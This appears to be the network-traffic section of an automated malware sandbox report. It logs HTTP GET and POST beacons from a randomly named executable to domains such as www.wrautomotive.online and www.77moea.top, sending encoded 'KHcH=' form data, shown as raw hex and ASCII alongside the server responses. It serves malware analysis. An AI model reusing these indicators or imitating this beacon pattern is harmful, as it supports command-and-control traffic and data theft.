31 4d 49 47 44 4a 6f 41 37 45 53 65 4b 59 47 78 51 45 6a 52 66 54 66 6e 75 63 4c 78 76 67 5a 46 6a 61 67 56 35 2f 78 77 6a 32 59 43 37 72 68 32 31 55 39 6b 53 4b 6f 4a 75 66 5a 46 41 65 76 50 43 76 68 63 36 74 4b 56 33 4c 48 78 45 54 47 52 4b 57 6c 37 56 2b 6c 57 45 69 44 31 4c 33 72 76 6e 4f 67 2f 4b 4e 48 50 70 31 51 38 46 49 53 72 4f 43 66 7a 48 58 36 30 4b 59 37 4a 65 52 61 31 33 61 2b 4f 48 75 2f 6b 51 6d 44
                                                                          Data Ascii: KHcH=b6dZwGuJuttsPijyBksTVC8bZ/e938/OsiLBeUVq65I7ejopuNxFj0PnLImWhlqUWOHgMrjz8QRwMsaEWPPh4JbTvlmsHy6Fant1YcLakhKF1ElUVwQJAz5fsBpUsbWPWAqPBvPWKvJOe+1us1yq+xspTAijNp6tyFn8PLvrNCuOnDzE4+JNi28CPVvVQ/vexSkIHRMScYQY4oLSzUtg9U9xRvAPzcdShSnmUoLEpaiM/n/WGS+4nAuVVzadCqTdpEBkRgtecxWxVT0a1Q6gpfAju3Og8MPxvolqoV90E7eth6dVdb/IeVstXx8ZZqWgR3yhdl9yxzfUNMJM/u9eleDTPwuh2otDgSRC61urG3GptgqkZsvjMeJnwPDLoaQACXId9cvR3asnmQtGiIkI5OyUw9oZypLXDaVtTBpjDuDRUdNaS0HIvqo8VpQ/Au7Gf86m/TV+0T1SWOb5yLQ46q1hN1bj7cESlHOpctCzz5EJ62y9hyRJQvkSElMeiwcNRpPG/aQMMbt2DQvm0YqoIdy9VLE/HsatWeQFBkpxEIf3zXoHloRHQeJAA04QA/3uL8PXdavO72FNsAMmTAClVccRM5ekizst4h2ulbvQOlRB124FuAXF3AjdaCXb+nHgz24Eq/bYYS9XzmBq0hkYP606Qv2xWeeJ35ti1iNHwzXXesr+waxCty3Icr4hKwxcuWsO5pd6EhWwvLARyGonR/90ZfO+CCY3RtXLaQ8uZl9RDIFeN5t2huNLlj6nPpZCvUM1xjaLP9OmP9XHSGriEA1OmdSYVuhCQW7wJktUazQVNiz4I+qAe19RY6g4Y8MSyhabTWSj7le/WH0GnGUyZQ/hkkKUKgwy3Nk+RiLwPthqwFBAc8iNx34zGY0IWPbMBJhR/V8x/N3I084xwqVdWZ7Uxv0camxrc8aYtF39S7U4i4MG/f67ie8/70ORxSQ65a4VeSZYzmFSQJcU6MTyR+2zwqWPhdOclWFlXZJj9gm7ZMtLUqFzsjU4w9CtyzFyE24nbBefAd7W+wx5Fh/Gz8cmPAjDflDG/rUO6qLGLEmykQWT/1MIGDJoA7ESeKYGxQEjRfTfnucLxvgZFjagV5/xwj2YC7rh21U9kSKoJufZFAevPCvhc6tKV3LHxETGRKWl7V+lWEiD1L3rvnOg/KNHPp1Q8FISrOCfzHX60KY7JeRa13a+OHu/kQmD
                                                                          Dec 2, 2023 18:51:00.461985111 CET380INHTTP/1.1 405 Not Allowed
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:51:00 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 157
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          48192.168.2.54976734.120.55.112801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:51:02.794456959 CET514OUTGET /ahec/?Vjk=-N-tntX&KHcH=W415zxONlMY0LROALmBwVywFRuOF9MDUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7agy86ItGv6ERTYYg== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.77moea.top
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:51:03.085356951 CET354INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:51:02 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 5208
                                                                          Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                          Vary: Accept-Encoding
                                                                          ETag: "65267254-1458"
                                                                          Cache-Control: no-cache
                                                                          Accept-Ranges: bytes
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Dec 2, 2023 18:51:03.093022108 CET1340INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                                          Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                                          Dec 2, 2023 18:51:03.093049049 CET1340INData Raw: 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 31 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6f 3d 7b 7d 2c 65
                                                                          Data Ascii: ar o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.navigator.userAgent.toLowerCase();return n.indexOf
                                                                          Dec 2, 2023 18:51:03.093064070 CET1340INData Raw: 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62 3f 22 61 6e 64 72 6f 69 64 22 3a 6e 2e 6d 61 74 63 68 28 2f 69 6f 73 2f 69 29 7c 7c 6e 2e 6d 61 74 63 68 28 2f 69 70 61 64 2f 69 29 7c
                                                                          Data Ascii: ent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&navigator.sendBeacon?send(s+="&is_beacon=1")
                                                                          Dec 2, 2023 18:51:03.093077898 CET1340INData Raw: 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 65 2e 73 65 74 41 74 74
                                                                          Data Ascii: ocument.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</script><title></title><script>var fontSize=w
                                                                          Dec 2, 2023 18:51:03.093092918 CET118INData Raw: 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 33 36 39 61 36 36 33 62 30 38 61 35 35 64 33 30 35 62 39 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: ic/archer_index.369a663b08a55d305b97.js"></script></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          49192.168.2.54976837.97.254.27801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:51:08.783616066 CET809OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.wrautomotive.online
                                                                          Origin: http://www.wrautomotive.online
                                                                          Referer: http://www.wrautomotive.online/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 30 67 49 6a 4b 6e 4b 32 42 4a 74 65 76 48 4b 5a 43 67 74 53 31 73 4d 79 79 56 56 48 30 76 79 36 36 4c 48 74 38 57 2f 56 34 57 4c 6c 46 2f 61 51 66 47 32 6e 4b 42 58 46 39 45 73 39 45 56 59 2b 43 64 45 6f 54 4b 67 63 53 32 48 46 33 4b 32 76 73 4e 50 78 36 59 4c 73 46 6e 73 6b 69 4d 4a 73 5a 68 74 5a 4f 64 44 44 35 6d 79 4e 4b 38 4b 72 6d 39 53 49 55 52 73 76 5a 4f 6c 74 4f 6b 7a 77 6b 47 4c 38 55 42 6f 56 51 79 7a 34 48 57 63 7a 51 4d 6c 61 52 4b 69 52 79 6e 7a 77 2f 72 48 32 79 4a 70 6c 5a 7a 6b 6e 35 37 35 78 46 30 42 59 50 51 3d 3d
                                                                          Data Ascii: KHcH=0gIjKnK2BJtevHKZCgtS1sMyyVVH0vy66LHt8W/V4WLlF/aQfG2nKBXF9Es9EVY+CdEoTKgcS2HF3K2vsNPx6YLsFnskiMJsZhtZOdDD5myNK8Krm9SIURsvZOltOkzwkGL8UBoVQyz4HWczQMlaRKiRynzw/rH2yJplZzkn575xF0BYPQ==
                                                                          Dec 2, 2023 18:51:08.963202000 CET242INHTTP/1.0 403 Forbidden
                                                                          Cache-Control: no-cache
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          50192.168.2.54976937.97.254.27801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:51:11.489062071 CET829OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.wrautomotive.online
                                                                          Origin: http://www.wrautomotive.online
                                                                          Referer: http://www.wrautomotive.online/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 30 67 49 6a 4b 6e 4b 32 42 4a 74 65 39 55 53 5a 41 42 74 53 30 4d 4d 78 72 6c 56 48 39 50 79 2b 36 4c 44 74 38 54 66 46 34 6c 76 6c 45 61 2b 51 59 33 32 6e 4c 42 58 46 79 6b 74 33 4b 31 5a 54 43 64 4a 56 54 4c 4d 63 53 32 6a 46 33 4c 71 76 73 2b 33 77 37 49 4c 69 49 48 73 6d 6d 4d 4a 73 5a 68 74 5a 4f 64 48 70 35 6d 71 4e 4b 4d 61 72 6e 5a 47 4c 56 52 73 75 65 4f 6c 74 4b 6b 7a 30 6b 47 4c 53 55 41 6c 79 51 78 62 34 48 55 45 7a 51 39 6c 62 62 4b 69 74 39 48 79 2b 2f 70 69 49 33 36 70 2b 55 77 74 68 36 72 51 43 4e 42 74 4c 49 75 62 50 66 4c 73 44 31 64 68 71 70 38 73 50 32 45 30 4b 71 57 6f 3d
                                                                          Data Ascii: KHcH=0gIjKnK2BJte9USZABtS0MMxrlVH9Py+6LDt8TfF4lvlEa+QY32nLBXFykt3K1ZTCdJVTLMcS2jF3Lqvs+3w7ILiIHsmmMJsZhtZOdHp5mqNKMarnZGLVRsueOltKkz0kGLSUAlyQxb4HUEzQ9lbbKit9Hy+/piI36p+Uwth6rQCNBtLIubPfLsD1dhqp8sP2E0KqWo=
                                                                          Dec 2, 2023 18:51:11.673322916 CET242INHTTP/1.0 403 Forbidden
                                                                          Cache-Control: no-cache
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          51192.168.2.54977037.97.254.27801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:51:14.188005924 CET1842OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.wrautomotive.online
                                                                          Origin: http://www.wrautomotive.online
                                                                          Referer: http://www.wrautomotive.online/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 30 67 49 6a 4b 6e 4b 32 42 4a 74 65 39 55 53 5a 41 42 74 53 30 4d 4d 78 72 6c 56 48 39 50 79 2b 36 4c 44 74 38 54 66 46 34 6c 6e 6c 46 70 47 51 62 51 43 6e 4e 78 58 46 73 30 74 30 4b 31 5a 72 43 64 41 65 54 4c 77 69 53 30 72 46 31 70 4f 76 37 66 33 77 79 49 4c 69 42 6e 73 37 69 4d 4a 35 5a 68 39 64 4f 64 58 70 35 6d 71 4e 4b 4f 53 72 33 39 53 4c 59 78 73 76 5a 4f 6c 68 4f 6b 7a 4d 6b 48 6a 6b 55 41 77 46 51 41 37 34 48 30 55 7a 53 76 4e 62 54 4b 69 72 70 6e 7a 6a 2f 70 65 74 33 36 46 36 55 78 70 62 36 70 77 43 4e 6c 4e 51 62 2f 76 45 42 4c 67 36 6c 50 46 59 77 71 6b 45 71 32 30 75 31 77 47 63 68 53 47 57 74 52 39 74 46 70 62 70 57 52 67 51 48 78 4f 77 58 54 6f 32 59 31 75 69 6d 67 38 67 54 73 54 4d 72 47 64 72 55 64 43 75 4c 61 53 78 36 59 61 38 4b 4f 47 2f 41 50 43 77 71 70 51 79 78 45 4a 72 6e 4c 59 6f 79 74 50 7a 6f 63 33 79 32 43 76 6c 31 48 53 79 30 65 55 4d 49 67 6d 39 49 33 4a 69 69 2f 44 77 4f 66 69 6b 2b 52 44 61 42 70 4b 5a 6a 67 7a 66 2b 37 35 48 73 76 67 44 62 72 58 79 63 33 41 77 38 74 68 74 75 6f 5a 32 58 68 41 6c 51 33 63 59 7a 67 78 67 50 37 34 75 41 55 79 33 58 64 36 4e 44 57 6e 34 54 30 61 32 4a 6d 4d 30 71 58 57 6f 74 4d 42 75 65 54 79 6a 73 33 55 51 78 75 6e 6b 32 72 4b 58 56 49 52 78 58 39 76 4b 4d 76 36 72 7a 71 54 55 44 7a 7a 67 45 64 42 46 75 42 51 68 4a 7a 51 64 50 6e 75 57 34 76 41 63 38 6f 38 4b 6c 32 50 53 67 5a 52 44 42 5a 68 63 77 6d 57 73 70 39 46 51 72 44 7a 4b 68 2b 2b 61 39 2b 70 55 49 41 54 78 4e 4f 47 51 6e 53 72 66 78 6f 54 6d 52 69 37 59 63 54 41 75 31 76 54 36 47 34 65 6c 6c 5a 58 6e 69 32 78 37 32 76 68 67 50 71 66 67 56 4d 35 4e 38 57 4f 47 54 38 6d 2f 50 41 2b 74 2b 55 31 42 42 6a 35 2f 55 35 70 4b 39 68 6c 47 58 4a 6a 79 73 55 4d 39 2b 73 77 6b 6e 72 62 55 39 2b 68 4d 67 44 58 39 61 46 64 47 71 66 61 2f 36 38 75 79 2b 54 31 47 79 45 33 51 48 79 56 6e 6e 66 57 57 64 65 6f 38 4e 5a 79 74 7a 38 4b 4a 61 32 73 32 79 35 55 65 6c 4d 69 39 2f 73 45 36 6b 53 50 49 4d 4d 6e 45 6a 4d 66 67 6c 6d 2b 74 4a 34 54 6a 47 35 5a 74 79 4f 48 4b 38 44 68 4e 35 47 69 6c 4b 59 4f 43 31 64 6a 45 4d 4f 6e 6f 6f 57 32 6d 2b 39 6d 66 55 52 4c 48 55 7a 49 35 56 49 56 6a 76 45 42 38 41 38 43 75 49 6b 32 37 6b 67 32 6b 64 6b 78 63 37 4c 44 75 6f 74 68 64 61 50 30 65 4f 47 6b 47 41 49 50 74 75 4d 4c 55 4b 4f 36 47 48 6e 77 2f 5a 47 45 75 57 69 54 55 52 73 76 32 4c 62 5a 5a 55 33 6a 79 44 2b 46 64 50 79 70 2b 35 55 68 30 2b 68 72 2f 38 70 7a 70 59 46 44 4a 73 35 70 6e 74 57 2b 34 58 58 69 76 39 71 58 6a 32 68 4f 32 68 53 79 46 34 67 44 73 30 68 75 75 31 70 42 6b 4e 7a 7a 53 68 51 69 2b 32 70 36 38 59 41 2f 54 4c 33 41 76 54 74 45 4f 35 46 69 43 75 2b 54 2f 6c 6c 54 4b 75 32 54 45 51 49 37 51 66 64 77 50 66 73 4b 66 30 4b 5a 30 4c 51 49 52 30 54 46 59 30 7a 31 36 43 5a 53 50 49 65 70 70 76 35 2b 66 74 52 50 55 79 67 34 47 79 31 41 43 47 79 78 54 32 36 63 6a 72 4b 33 4b 43 49 34 4f 4e 4c 64 4c 55 78 65 48 7a 31 63 45 32 58 42 2f 32 59 42 32 72 78 4c 58 59 58 79 75 65 69 50 52 51 71 33 58 66 56 79 6c 2b 4e 75 49 4f 42 75 59 32 52 63 64 66 38 6d 5a 5a 53 44 6b 52 6b 57 6c 66 69 72 6f 59 4d 6a 69 59 58 45 54 48 6e 74 47 4c 54 54 37 4b 4e 75 55 73 43 7a 53 4f 54 5a 37 31 55 66 36 63 35 49 32 76 44 59 33 78 49 51 78 67 59 65 4e 76 33 2b 34 4a 78 39 78 6c 34 6f 45 4c 38 71 67 4c 69 38 4d 56 37 49 67 71 6b 47 39 65 65 50 56 51 66 6b 4b 71 38 46 46 7a 38 66 35 6c 6b 36 71 37 6e 51 45 56 52 2f 79 70 2f 4d 47 71 2f 71 37 71 4c 77 70 6a 52 4e 78 2b 45 46 33 38 32 5a 7a 72 65 5a 2b 51 63 4c 65 55 2f 65 64 6e 35 44 38 4d 4e 69 47 63 4b 79 44 43 4c 63 70 52 4c 4a 2b 6b 73 76 6c 32 42 63 68 7a 32 43 6d 71 6d 72 51 4f 41 54 73 39 31 32 61 76 34 38 74 66 75 69 52 46 6e 79 2f
                                                                          Data Ascii: KHcH=0gIjKnK2BJte9USZABtS0MMxrlVH9Py+6LDt8TfF4lnlFpGQbQCnNxXFs0t0K1ZrCdAeTLwiS0rF1pOv7f3wyILiBns7iMJ5Zh9dOdXp5mqNKOSr39SLYxsvZOlhOkzMkHjkUAwFQA74H0UzSvNbTKirpnzj/pet36F6Uxpb6pwCNlNQb/vEBLg6lPFYwqkEq20u1wGchSGWtR9tFpbpWRgQHxOwXTo2Y1uimg8gTsTMrGdrUdCuLaSx6Ya8KOG/APCwqpQyxEJrnLYoytPzoc3y2Cvl1HSy0eUMIgm9I3Jii/DwOfik+RDaBpKZjgzf+75HsvgDbrXyc3Aw8thtuoZ2XhAlQ3cYzgxgP74uAUy3Xd6NDWn4T0a2JmM0qXWotMBueTyjs3UQxunk2rKXVIRxX9vKMv6rzqTUDzzgEdBFuBQhJzQdPnuW4vAc8o8Kl2PSgZRDBZhcwmWsp9FQrDzKh++a9+pUIATxNOGQnSrfxoTmRi7YcTAu1vT6G4ellZXni2x72vhgPqfgVM5N8WOGT8m/PA+t+U1BBj5/U5pK9hlGXJjysUM9+swknrbU9+hMgDX9aFdGqfa/68uy+T1GyE3QHyVnnfWWdeo8NZytz8KJa2s2y5UelMi9/sE6kSPIMMnEjMfglm+tJ4TjG5ZtyOHK8DhN5GilKYOC1djEMOnooW2m+9mfURLHUzI5VIVjvEB8A8CuIk27kg2kdkxc7LDuothdaP0eOGkGAIPtuMLUKO6GHnw/ZGEuWiTURsv2LbZZU3jyD+FdPyp+5Uh0+hr/8pzpYFDJs5pntW+4XXiv9qXj2hO2hSyF4gDs0huu1pBkNzzShQi+2p68YA/TL3AvTtEO5FiCu+T/llTKu2TEQI7QfdwPfsKf0KZ0LQIR0TFY0z16CZSPIeppv5+ftRPUyg4Gy1ACGyxT26cjrK3KCI4ONLdLUxeHz1cE2XB/2YB2rxLXYXyueiPRQq3XfVyl+NuIOBuY2Rcdf8mZZSDkRkWlfiroYMjiYXETHntGLTT7KNuUsCzSOTZ71Uf6c5I2vDY3xIQxgYeNv3+4Jx9xl4oEL8qgLi8MV7IgqkG9eePVQfkKq8FFz8f5lk6q7nQEVR/yp/MGq/q7qLwpjRNx+EF382ZzreZ+QcLeU/edn5D8MNiGcKyDCLcpRLJ+ksvl2Bchz2CmqmrQOATs912av48tfuiRFny/
                                                                          Dec 2, 2023 18:51:14.368026972 CET242INHTTP/1.0 403 Forbidden
                                                                          Cache-Control: no-cache
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          52192.168.2.54977137.97.254.2780
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:51:17.515954018 CET523OUTGET /ahec/?KHcH=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+zzorQEnBYkPkOfg==&Vjk=-N-tntX HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.wrautomotive.online
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:51:17.698211908 CET1340INHTTP/1.1 200 OK
                                                                          Date: Tue, 19 Sep 2023 17:56:11 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: text/html
                                                                          Cache-Control: max-age=31536000
                                                                          X-Varnish: 628270294 3
                                                                          Age: 6393306
                                                                          Via: 1.1 varnish (Varnish/6.1)
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 64668
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 61 73 63 69 69 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 53 6f 75 72 63 65 2b 53 61 6e 73 2b 50 72 6f 3a 34 30 30 2c 39 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 63 73 73 2f 63 6f 6d 62 69 6e 65 64 2d 6d 69 6e 2e 63 73 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 42 65 7a 65 74 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 